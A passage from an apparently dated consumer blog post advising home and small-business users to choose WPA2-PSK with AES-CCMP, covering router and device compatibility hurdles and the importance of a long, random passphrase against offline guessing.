It's not the flaws themselves that make WPA2-AES the best option, but the fact that they are cracks in the dam. Who knows what will turn up next? There are no known flaws in WPA2-AES, which was developed last and built on and improved the work in the earlier security protocols.

Problems Getting to WPA2

Everyone who can should opt for WPA2-AES, but there may be roadblocks.

WPA2-AES requires more computational horsepower than WPA-TKIP. Older routers may not have sufficient horsepower. If your router does not offer WPA2, you can check for a firmware update, but most likely you'll have to buy a new router to get the best security.

Then too, since it is the latest and greatest, WPA2-AES may not be supported on the computer, smartphone, gaming machine, Internet radio or whatever other device you want to use with your wireless network.

For example, Windows XP SP2 does not support WPA2, even if it has been kept up to date on patches. A "hotfix" (KB893357) needs to be installed to add WPA2 support to Windows XP SP2.

A WPA2 router may offer both TKIP and AES simultaneously. Start with AES only and hope for the best. Only chose this option if you have to, to support an older device.

The AES-CCMP security protocol was a long time coming. Rather than wait, some hardware manufacturers added early versions of the protocol to WPA routers. Since these were based on draft, rather than final versions of the protocol, they may or may not work with newer hardware and software.

Still, if replacing an old WPA router is a big deal, I suppose it's worth a try.

Two Other Aspects of Security

WPA and WPA2 both come in two flavors, Personal and Enterprise. In the Personal version there is a single password, in the Enterprise version each user of the wireless network gets their own password. The Personal version is also known as Pre-Shared Key or PSK for short.

So, technically, the best security for consumers and small businesses is WPA2-PSK-AES-CCMP.

However, this entire alphabet soup falls down if you chose a poor password.

Data is still traveling over the air and can be captured and saved by a bad guy who can then try to guess the password offline – thousands of guesses a second for days on end.

Perhaps no one will attack the network you connect to this way, but if they do, the only defense is a long, reasonably random password. WPA and WPA2 support passwords up to 63 characters long. Better yet, think "pass sentence" rather than password. For more on this see my blog, What no one is saying about WPA2 security.